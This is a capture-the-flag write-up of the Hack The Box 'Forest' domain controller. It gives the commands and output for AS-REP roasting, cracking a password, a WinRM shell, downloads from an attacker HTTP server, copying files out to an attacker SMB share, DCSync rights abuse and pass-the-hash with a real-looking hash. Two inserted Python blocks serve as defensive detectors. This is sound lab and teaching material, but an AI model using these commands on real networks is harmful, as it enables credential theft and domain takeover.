Name: Forest
Release Date: 22 Oct 2019
Retire Date: 21 Mar 2020
OS: Windows
Base Points: Easy - Retired [0]
cube0x0 00 days, 03 hours, 20 mins, 45 seconds
cube0x0 00 days, 03 hours, 23 mins, 31 seconds
Creator: egre55
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -oA ./forest

$  nmap -sC -sV -oA ./forest
  Starting Nmap 7.80 ( ) at 2020-04-01 15:40 EDT
  Nmap scan report for
  Host is up (0.095s latency).
  Not shown: 989 closed ports
  53/tcp   open  domain?
  | fingerprint-strings: 
  |   DNSVersionBindReqTCP: 
  |     version
  |_    bind
  88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-01 19:48:38Z)
  135/tcp  open  msrpc        Microsoft Windows RPC
  139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
  389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
  445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
  464/tcp  open  kpasswd5?
  593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
  636/tcp  open  tcpwrapped
  3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
  3269/tcp open  tcpwrapped
  1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
  Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

  Host script results:
  |_clock-skew: mean: 2h27m08s, deviation: 4h02m32s, median: 7m06s
  | smb-os-discovery: 
  |   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
  |   Computer name: FOREST
  |   NetBIOS computer name: FOREST\x00
  |   Domain name: htb.local
  |   Forest name: htb.local
  |   FQDN: FOREST.htb.local
  |_  System time: 2020-04-01T12:51:00-07:00
  | smb-security-mode:
  |   account_used: guest
  |   authentication_level: user
  |   challenge_response: supported
  |_  message_signing: required
  | smb2-security-mode: 
  |   2.02: 
  |_    Message signing enabled and required
  | smb2-time: 
  |   date: 2020-04-01T19:50:57
  |_  start_date: 2020-03-31T20:11:05

  Service detection performed. Please report any incorrect results at .
  Nmap done: 1 IP address (1 host up) scanned in 308.31 seconds

Here we have a Windows Server 2016 running DNS, SMB, LDAP, and a few other niceties, but amazingly no web ports.  Combine LDAP with the name of the box, "Forest", and we can be fairly certain that this is a Domain Controller and that we are attacking LDAP.  So, first off, let's check the LDAP service to see if anonymous binding is enabled.  We do this with


  ldapsearch -h -p 389 -x -b "dc=htb,dc=local"


In ldapsearch, -h is the host, -p is the port, -x selects simple authentication (with no credentials supplied, that is an anonymous bind), and -b is the base distinguished name, which we can pull from the SMB response in the nmap output.  The output is too large to add here, but it is in the above CTB file.  In line 7,826 (not joking) of the ldapsearch output, we find svc-alfresco.  Alfresco is a content and process service.  One of their support documents, here, tells us that Kerberos pre-authentication must be off in order for Alfresco to work with AD.  Excellent!  That means we can request a Kerberos ticket as svc-alfresco without knowing the password, and the AS-REP we get back is encrypted with a key derived from that password, so it can be cracked offline.  Somebody didn't think that one through.  If we do a Google search for Kerberoast with Alfresco, our top result is Roasting AS-REPs.  Using from impacket, we can grab the hash.
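A defender's check, added here and not part of the original write-up: the same ldapsearch output can be scanned for the setting that made svc-alfresco roastable.  Bit 0x400000 (DONT_REQ_PREAUTH) in userAccountControl marks accounts that do not require Kerberos pre-authentication.  The LDIF below is a constructed sample in ldapsearch's layout, not the box's actual dump; the accounts other than svc-alfresco are made up.

```python
import re
from typing import Dict, List

# userAccountControl bit that turns off Kerberos pre-authentication (UF_DONT_REQUIRE_PREAUTH).
DONT_REQ_PREAUTH = 0x400000
# ACCOUNTDISABLE bit: a disabled account cannot obtain an AS-REP, so it is reported separately.
ACCOUNT_DISABLED = 0x0002

# Constructed sample in ldapsearch/LDIF layout; values are illustrative, not the real dump.
SAMPLE_LDIF = """\
dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco
userAccountControl: 4260352

dn: CN=Sebastien Caron,OU=Users,DC=htb,DC=local
sAMAccountName: sebastien
userAccountControl: 66048

dn: CN=old-svc,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: old-svc
userAccountControl: 4260354
"""

def parse_ldif(text: str) -> List[Dict[str, str]]:
    """Split LDIF into blank-line separated entries and collect 'attr: value' pairs."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():          # a blank line ends the current entry
            if current:
                entries.append(current)
                current = {}
            continue
        m = re.match(r"^([A-Za-z][\w-]*):\s*(.*)$", line)
        if m:
            current[m.group(1)] = m.group(2)
    if current:
        entries.append(current)
    return entries

def find_preauth_disabled(text: str) -> List[Dict[str, object]]:
    """Return accounts whose userAccountControl has DONT_REQ_PREAUTH set, with disabled state."""
    findings = []
    for entry in parse_ldif(text):
        uac = int(entry.get("userAccountControl", "0"))   # ldapsearch prints it in decimal
        if uac & DONT_REQ_PREAUTH:
            name = entry.get("sAMAccountName", entry.get("dn", "?"))
            findings.append({"account": name, "disabled": bool(uac & ACCOUNT_DISABLED)})
    return findings
```

Run it against a real ldapsearch dump and every enabled hit is an account that should either get pre-authentication turned back on or a long random password.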

$  python3 /impacket/examples/ htb.local/svc-alfresco -no-pass -dc-ip
  Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation

  [*] Getting TGT for svc-alfresco

Let's use hashcat to break it.

$  hashcat -m 18200 --force -a 0 hash.txt /usr/share/wordlists/rockyou.txt 

  *Dictionary cache hit:
  * Filename..: /usr/share/wordlists/rockyou.txt
  * Passwords.: 14344385
  * Bytes.....: 139921507
  * Keyspace..: 14344385

  Session..........: hashcat
  Status...........: Cracked
  Hash.Type........: Kerberos 5 AS-REP etype 23
  Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:a040aefd7bff80...01f76d
  Time.Started.....: Wed Apr  1 16:28:48 2020 (5 secs)
  Time.Estimated...: Wed Apr  1 16:28:53 2020 (0 secs)
  Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
  Guess.Queue......: 1/1 (100.00%)
  Speed.#1.........:   826.1 kH/s (11.65ms) @ Accel:64 Loops:1 Thr:64 Vec:8
  Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
  Progress.........: 4096000/14344385 (28.55%)
  Rejected.........: 0/4096000 (0.00%)
  Restore.Point....: 4079616/14344385 (28.44%)
  Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
  Candidates.#1....: s9039554h -> s/nd/0s

  Started: Wed Apr  1 16:28:38 2020
  Stopped: Wed Apr  1 16:28:55 2020

So, the password is s3rvice.  That's just laziness right there.  It's a Windows box, so SSH is out.  Let's expand our port scan and see if any other remote access services are available.

Interestingly enough, we do find another port open: 47001, with WinRM running on it.

$    nmap -p-
  Starting Nmap 7.80 ( ) at 2020-04-01 20:28 EDT
  Nmap scan report for
  Host is up (0.13s latency).
  Not shown: 65511 closed ports
  53/tcp    open  domain
  88/tcp    open  kerberos-sec
  135/tcp   open  msrpc
  139/tcp   open  netbios-ssn
  389/tcp   open  ldap
  445/tcp   open  microsoft-ds
  464/tcp   open  kpasswd5
  593/tcp   open  http-rpc-epmap
  636/tcp   open  ldapssl
  3268/tcp  open  globalcatLDAP
  3269/tcp  open  globalcatLDAPssl
  5985/tcp  open  wsman
  9389/tcp  open  adws
  47001/tcp open  winrm
  49664/tcp open  unknown
  49665/tcp open  unknown
  49666/tcp open  unknown
  49667/tcp open  unknown
  49671/tcp open  unknown
  49676/tcp open  unknown
  49677/tcp open  unknown
  49684/tcp open  unknown
  49706/tcp open  unknown
  49910/tcp open  unknown

  Nmap done: 1 IP address (1 host up) scanned in 720.02 seconds

To exploit WinRM, let's use Evil-WinRM, which can be found on the HackPlayers GitHub here.


So, with ruby evil-winrm.rb -i -u svc-alfresco -p s3rvice, we get a low-level shell.  Let's now map out the domain and see what privileges everyone has.  First, let's get BloodHound (its SharpHound collector) onto the target.  You can get BloodHound here (or just use pip install bloodhound or apt-get install bloodhound; I went the apt-get direction), and I highly recommend it.  For AD mapping it's a powerful tool.  To get it to the target, set up a simple HTTP server and use:


  Attacker Machine:
    python3 -m http.server 8081
  Victim Machine:
    (new-object System.Net.WebClient).DownloadFile('http://YOURIP:PORT/SharpHound.exe', 'C:\Users\svc-alfresco\Desktop\SharpHound.exe')


It will create two new files.  You need to get those files back to your machine.  Easily done with a little certutil magic.

Next, we can use the from impacket to move the files over.  Create a folder named smb, and then run:

  Attacking Machine:
    sudo python3 /impacket/examples/ share smb
  Victim Machine:
    Copy-Item -Path ./ -Destination \\10.10.XX.XX\share\;
    Copy-Item -Path ./MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin -Destination \\10.10.XX.XX\share\MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin;

The files are now on your machine.  Time to fire up BloodHound.  To start, use:

  sudo neo4j console


If this is your first time using BloodHound, or you are using it for the first time on a fresh install, you first need to go to http://localhost:7474 and change the default neo4j:neo4j credential.  When you run BloodHound, you'll need to use those new creds.  Set your starting "node" as svc-alfresco@htb.local.  When BloodHound shows you the user, right-click on it and select Owned.  Click on the three stacked horizontal lines (the hamburger :D) and select the Queries tab.  From there, select "Shortest Paths from Owned Principals".

The graph shows the chain of permissions starting from svc-alfresco:

1) svc-alfresco is a member of Account Operators, which can create accounts.
2) Account Operators has GenericAll on the Exchange Windows Permissions group, so it can add users to that group.
3) Exchange Windows Permissions has WriteDACL on the domain object.

I'm going to rapid-fire the next few commands.  We are going to create a new user, add that user to the Exchange Windows Permissions group, and then use the new user with PowerView (from PowerSploit) to grant it DCSync rights and dump all of the password hashes.  Here goes:


  Victim Machine:
    net user uvbeenhacked password /add /domain
    net group "Exchange Windows Permissions" /add uvbeenhacked
  Attacking Machine (in the directory PowerView is in, PowerSploit/Recon/PowerView.ps1):
    python -m SimpleHTTPServer 8081
  Victim Machine:
    (new-object System.Net.WebClient).DownloadFile('http://10.10.XX.XX:8081/PowerView.ps1', 'C:\Users\svc-alfresco\Desktop\PowerView.ps1')
    Import-Module C:\Users\svc-alfresco\Desktop\PowerView.ps1
    $pass = convertto-securestring 'password' -AsPlainText -Force
    $cred = New-Object System.Management.Automation.PSCredential('htb\uvbeenhacked', $pass)
    Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity uvbeenhacked -Rights DCSync
  Attacking Machine:
    sudo python3 /impacket/examples/ htb.local/uvbeenhacked:password@
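From the defender's side, as an added example that is not part of the original write-up: the DCSync run above shows up on the domain controller as Security event 4662 whose Properties field lists the replication control-access right GUIDs.  The events below are constructed (they mirror the fields a SIEM extracts from 4662, with the FOREST$ computer account standing in for legitimate DC-to-DC replication), and the DC_ACCOUNTS allow-list is an assumption you would fill from your own inventory.

```python
import re
from typing import Dict, List

# Control-access rights DCSync needs; their GUIDs appear in the Properties field of event 4662.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed sample events, not real logs: DC-to-DC replication, the DCSync from the new user,
# and an unrelated 4662 whose Properties GUID is a placeholder (not a real schema GUID).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "FOREST$", "SubjectDomainName": "HTB",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "uvbeenhacked", "SubjectDomainName": "HTB",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "sebastien", "SubjectDomainName": "HTB",
     "Properties": "{deadbeef-0000-4000-8000-000000000001}"},
]

GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)
# Assumption: computer accounts of the domain controllers, which replicate legitimately.
DC_ACCOUNTS = {"FOREST$"}

def replication_rights(event: Dict[str, object]) -> List[str]:
    """Names of replication rights referenced by a 4662 event (empty list if none)."""
    if event.get("EventID") != 4662:
        return []
    guids = {g.lower() for g in GUID_RE.findall(str(event.get("Properties", "")))}
    return sorted(REPLICATION_GUIDS[g] for g in guids if g in REPLICATION_GUIDS)

def detect_dcsync(events: List[Dict[str, object]], dc_accounts=DC_ACCOUNTS) -> List[Dict[str, object]]:
    """Flag replication requests whose subject is not an allow-listed DC computer account."""
    allowed = {a.upper() for a in dc_accounts}
    alerts = []
    for ev in events:
        rights = replication_rights(ev)
        subject = str(ev.get("SubjectUserName", ""))
        if rights and subject.upper() not in allowed:
            alerts.append({"subject": str(ev.get("SubjectDomainName", "")) + "\\" + subject,
                           "rights": rights})
    return alerts
```

Accounts that legitimately hold these rights, such as a directory synchronisation service account, belong in the allow-list as well, otherwise they alert on every sync.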

From here, we can pass the hash to get an Administrator shell using:

  /impacket/examples/ -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@